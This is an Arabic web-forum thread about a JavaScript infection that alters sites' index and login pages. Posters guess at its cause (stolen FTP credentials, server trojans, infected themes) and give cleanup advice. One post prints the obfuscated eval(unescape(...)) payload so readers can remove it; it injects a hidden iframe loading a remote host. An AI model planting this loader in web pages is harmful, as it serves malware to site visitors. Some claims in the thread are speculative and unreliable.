| |||||||
| المدوّنات | البحث | مشاركات اليوم | اجعل كافة المشاركات مقروءة |
|
| | LinkBack | أدوات الموضوع |
| |||||
![]() عبارة عن كود جافا سكربت يصيب صفحات الاندكس بالموقع وقلما ما يصيب الصفحات الاخري تكاثره عن طريق السيرفر لانه يصيب حتي الصفحات التي تحتوي علي جدار ناري وكلمات مرور اريد ان اعرف من هو السبب في اصابة موقعي بهذا الفايروس وهل السبب في ذلك هو رفعي لملف مصاب وهذا اشك فيه لاني مثبت كاسبر سكاي والذي يرفض حتي مجرد التفكير في تنزيل الملف المصاب علي الجهاز ام ان السبب هو السيرفر فالسيرفر حتي لا يحتوي علي اداة اسكان في السي بانل واذا كان من السيرفر لماذا اصاب هذا الموقع فقط ولم يصيب باقي المواقع الموجودة في الريسلر ارجو النصح من اخواني فقد استخدمت محرك البحث ولم اجد معلومة مؤكدة في هذا الموضوع
__________________ ... ... ... ... ... ... ... ... ... ... ... ... ... ... منتديات أمل الأمة .. يد بيد نحيي الأمة www.amlalommah.info ... ... ... ... ... ... ... ... ... ... ... ... ... ... | |||||
|
| |||||
|
شكرا علي المشاركة
__________________ ... ... ... ... ... ... ... ... ... ... ... ... ... ... منتديات أمل الأمة .. يد بيد نحيي الأمة www.amlalommah.info ... ... ... ... ... ... ... ... ... ... ... ... ... ... | |||||
|
| |||||
|
فيروسات جافاسكريبت javascript malware قد تستخدم اى من الطريقتين XSS او CSRF و من خلالها يمكن مسح العضاء او التعديل على تصميم الموقع او عمل أى شىء لأنه بمنتهى البساطه بمكنه الحصول على باسورد الادمن من خلال سطرين كود ... الحمايه منه كالاتى : 1- إستخدام برمجيه امنه مع العلم بأى اكبر البرمجيات مثل VB و ال wordpress تكون مصابه بمثل هذا الثغرات XSS و CSRF و حالما يتم اكتشافها يتم اغلاقها فلذلك قم بمتابعه موقع milw0rm.com الذى يحتوى على كل الجديد من ناحيه ثغرات المواقع و قم بإغلاقه 2- اذا كنت انت مبرمج فقم بإتباع الخطاوات الصحيحه لعمل validation لأى بيانات يقوم ادخالها المستخدم لأن الاكواد الخبيثه ليس شرط ان تكون داخل ملفات ... ممكن يتم ادخالها بشكل طبيعى على هيئه نص و يتم ترجمتها فيروسات جافاسكريبت javascript malware لا يتم إصطيادها بواسطه اى برنامج فيروسات لأنها ذكيه جدا و غالبه ماتستخدم reverse engineering و بعض التقنيات مثل morphing حتى تتخطى أى filter
__________________ Keepondev | مدونه شديد التخصص فى الجافاسكربت ماذا يمكننى أن أفعل إذا تعلمت جافاسكريبت ?? | |||||
|
| |||||
|
السلام عليكم موقع السيارات لما ادخله الكاسير يصاد تروجات تفضلوا نادي السيارات - موقع سيارات يختص بـ صور و في&# هل هو نفس النوع والا ما يصيد معكم شي ؟ ابوهيثم
__________________ شكرا دائماً وابداً يا عبدالرحمن [العنكبوتي] شبكة البرامج العربية والمعربة منتديات فاول الرياضي مدونة فضفضة مواضيعي وردودي تمثلني فقط | |||||
|
| |||||
| اقتباس:
لسببين : الاول ان الكاسبر يمنع دخول هذا الموقع نهائيا ثانيا لا استطيع تنزيل اي ملف من الملفات المصابة بسبب منع الكاسبر
__________________ ... ... ... ... ... ... ... ... ... ... ... ... ... ... منتديات أمل الأمة .. يد بيد نحيي الأمة www.amlalommah.info ... ... ... ... ... ... ... ... ... ... ... ... ... ... | |||||
|
| |||||
| اقتباس:
ثانيا الموقع لم اعلن عن بعد ولم ينزل له ترتيب في اليكسا ولم يؤرشف صفحة واحدة منه في جوجل وكأني الوحيد الذي يعلم بهذا الموقع فلا اظن ان احد حاول اختراق موقعي فهل ينطبق علي كلامكم ؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟
__________________ ... ... ... ... ... ... ... ... ... ... ... ... ... ... منتديات أمل الأمة .. يد بيد نحيي الأمة www.amlalommah.info ... ... ... ... ... ... ... ... ... ... ... ... ... ... | |||||
|
| |||||
| اقتباس:
غير ان موقعي الكاسبر يمنع دخوله نهائيا اقصد الصفحات المصابة فقط
__________________ ... ... ... ... ... ... ... ... ... ... ... ... ... ... منتديات أمل الأمة .. يد بيد نحيي الأمة www.amlalommah.info ... ... ... ... ... ... ... ... ... ... ... ... ... ... | |||||
|
| |||||
| هيا نتناقش اولا الكاسبر اللي عندي اخر نسخة ومحدثة لاخر يوم ثانيا الكاسبر لا يقبل تصفح الموقع ولا حتي المرور عليه ثالثا الكاسبر يمنع نزول اي ملف مصاب عن طريق الاف تي بي او اي برنامج تحميل اخر عند محاولة تعديل الملف عن طريق السي بانل الكاسبر يمنع دخول صفحة التعديل لاحتوائها علي كود الفايروس فكيف بعد كل هذا يكون جهازي مفيرس ولا يكتشفه الفايروس ؟
__________________ ... ... ... ... ... ... ... ... ... ... ... ... ... ... منتديات أمل الأمة .. يد بيد نحيي الأمة www.amlalommah.info ... ... ... ... ... ... ... ... ... ... ... ... ... ... | |||||
|
| |||||
| اقتباس:
بعض الفيروسات عند اصابتها الجهاز تأخذ الأمان من مكافح الفيروسات المتواجد على الجهاز بحيث يراها ملف طبيعي ولا يوجد به اي مشكله | |||||
|
| |||||
|
شكرا انجاز هوست معلومات قيمة ساقوم بتجربتها وشكرا لباقي الاخوة الكرام علي المشاركة
__________________ ... ... ... ... ... ... ... ... ... ... ... ... ... ... منتديات أمل الأمة .. يد بيد نحيي الأمة www.amlalommah.info ... ... ... ... ... ... ... ... ... ... ... ... ... ... | |||||
|
| |||||
|
بالفعل اصبت به قبل فترة على الاندكس والكاسبر الوحيد الى كشفه ولما بحث عنه تبين انه كود في الصفحة قمت بازالته والامر اصبح تمام المشكلة انه قوقل كان معتبر الموقع مضر وحاطط تحذير عليه ![]() ولكن بعد فترة لوحدهم رفعوا الحظر بعدما اتضح لهم انني شلت الكود .... الان الفايرس هاد هل هو من ملف مصاب على الجهاز تم رفعه للموقع أم أن الفايرس من السيرفر ؟؟؟؟
__________________ مهندس أحمد إتصالات وإلكترونيات مسلم عربي فلسطيني I♥ Allah مرئية فلسطين على اليوتيوب خلجات قلب .... | |||||
|
| |||||
|
ننتظر الاجابة لسؤال المهندس احمد
__________________ ... ... ... ... ... ... ... ... ... ... ... ... ... ... منتديات أمل الأمة .. يد بيد نحيي الأمة www.amlalommah.info ... ... ... ... ... ... ... ... ... ... ... ... ... ... | |||||
|
| |||||
| اقتباس:
![]() وانا شيلتة يدوى ولكن نزل تانى لانة كان فية صفحة مشيلتهاش لانة الظاهر بينتشر تانى لواحدة على الملفات كلها تانى بس الحمد لله تخلصت منة خالص ![]() المهم الوقتى هو لو زى مابتقول على الجهاز فاية الطريقة الى نشيله بها ؟ ![]() لان النود مش واخد بالة منة خالص | |||||
|
| |||||
| اقتباس:
| |||||
|
| |||||
|
طيب حتى تعرف انه من السيرفر او من جهازك , ارفع ملف فارغ الى السيرفر, فاذا اضاف السيرفر كود للملف الفارغ فالمشكله من السيرفر اكيد , واذا لم يضيف فهناك احتمال ان تكون المشكله من جهازك... يعني ارفع ملف index.php خالي من المحتويات الى الموقع وانظر هل اضاف السيرفر له اكواد جديده ام لا؟ انا اتوقع ان المشكله من السيرفر يوجد به تروجان يضيف محتويات لصفحات المواقع أو جرب ترفع صفحاتك لسيرفر اخر وانظر هل تطلع نفس المشكله او لا الافضل هو انك تكتب اسم الفايروس هنا حتى نبحث عنه ومعرفة طريقة عمله
__________________ >> يشدني ريح العطر في ثيابه !!!!!!! | |||||
|
| |||||
|
السلام عليكم ورحمة الله وبركاته باذن الله سوف اعطيكم ملخص لهذا اللعين لأني تعاملت معه منذ لحظة الاكتشاف مرورا بالتقصي والتتبع انتهائا بالتطهير ![]() اولا الامر ينشأ من فايرس يصيب جهازك وليس من الضروري يكون جهازك فربما تستخدم ال ftp لموقعك انت واشخاص اخرون فربما المصاب هو جهاز احدهم كيف يعمل ؟ الفايرس يسوي اتصال عبر برنامج ال ftp ثم يرسل بيانات الموقع الى سيده وهو يحمل هذا الاي بي 85.17.230.150 ( ليس بالضرورة ان يظل يستخدم هذا الاي بي مدى الحياة فمن الذكاء تغيير الاي بي باستمرار ) كيفية العلاج اولا بحظر الاي بي وذلك يتم بالرجوع اولا الى لوق السيرفر ومعرفة اي بي عدونا اللدود ثانيا هذا الفايروس شديد الدهاء عبقري يصيب اشد اسماء الصفح شهرة وباي امتداد وسوف اعطيكم ملخص باسماء هذه الصفحات "main,index,default,login,header,footer" افتح اي ملف يحمل هذا الاسم واحذف منه كود الجافا والذي سوف اكتبه الان لسببين اولهم حتى تقوموا بحذفه الثاني حتى يصل الينا من محركات البحث كل من اصابه هذا اللعين فلطالما بحثت واستغثت بقووقل ولكن لم اجد من يتكلم عن هذا اللعين واعتقد اننا اول موقع يتكلم عنه وقووقل يشهد كود: <script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%36%39%61%30%36%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%39%37%37%33%39%38%35%33%30%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%39%31%31%33%36%29%2b%27%34%39%31%5c%27%20%77%69%64%74%68%3d%33%35%36%20%68%65%69%67%68%74%3d%32%35%36%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); </script> | |||||
|
| |||||
|
السلام عليكم ورحمة الله وبركاته سبب الفايروس والاصابة الحقيقية في بدايتها تكون في ثيمات ويندوز فيستا فهذا الفايروس مزروع في ثيمات فيستا وحين يقوم احد بتحميل الثيم ويركبه يحصل ما يحصل بالنسبة للفايروس ويقوم بعمله والكاسبر لا يكشف الفايروس قبل تثبيت الثيم ويكشفه بعد القيام بتثبيته وهذا ما حصل معي شخصيا بالاضافة لما ذكره الاخ دعمي بقي امرين للحماية 1- احذف كافة حسابات الاف تي التي تقوم بحفظها في برنامج الاف تي بي الذي تستخدمه على جهازك ولا تقم بحفظ اي بيانات موقع في البرنامج 2- عدل كلمات المرور للوحة التحكم وحسابات الاف تي بي وعلى مسؤوليتي ان عاد مرة اخرى بالتوفيق | |||||
|
![]() |
| أدوات الموضوع | |
| |
المواضيع المتشابهه | ||||
| الموضوع | كاتب الموضوع | المنتدى | مشاركات | آخر مشاركة |
| مواعيد الدراسة للعشر سنوات القادمة KSA | mad921 | سوالف عامة | 5 | 01-11-2007 05:41 PM |
| المواقع الشخصية ...الى متى .. تكرار .....دعوة لتوحيد المواقع والجهود الشخصية ..شارك | المعاصر | أخبار الإنترنت والتقنية ومناقشتها | 2 | 17-02-2001 12:56 AM |
| المواقع الشخصية ...الى متى .. تكرار .....دعوة لتوحيد المواقع والجهود الشخصية ..شارك | المعاصر | تطوير الويب | 8 | 25-04-2000 11:21 PM |
| المواقع الشخصية ...الى متى .. تكرار .....دعوة لتوحيد المواقع والجهود الشخصية ..شارك | المعاصر | تطوير الويب | 1 | 21-04-2000 03:04 PM |
| المواقع الشخصية ...الى متى .. تكرار .....دعوة لتوحيد المواقع والجهود الشخصية ..شارك | المعاصر | سوالف عامة | 0 | 16-04-2000 10:02 AM |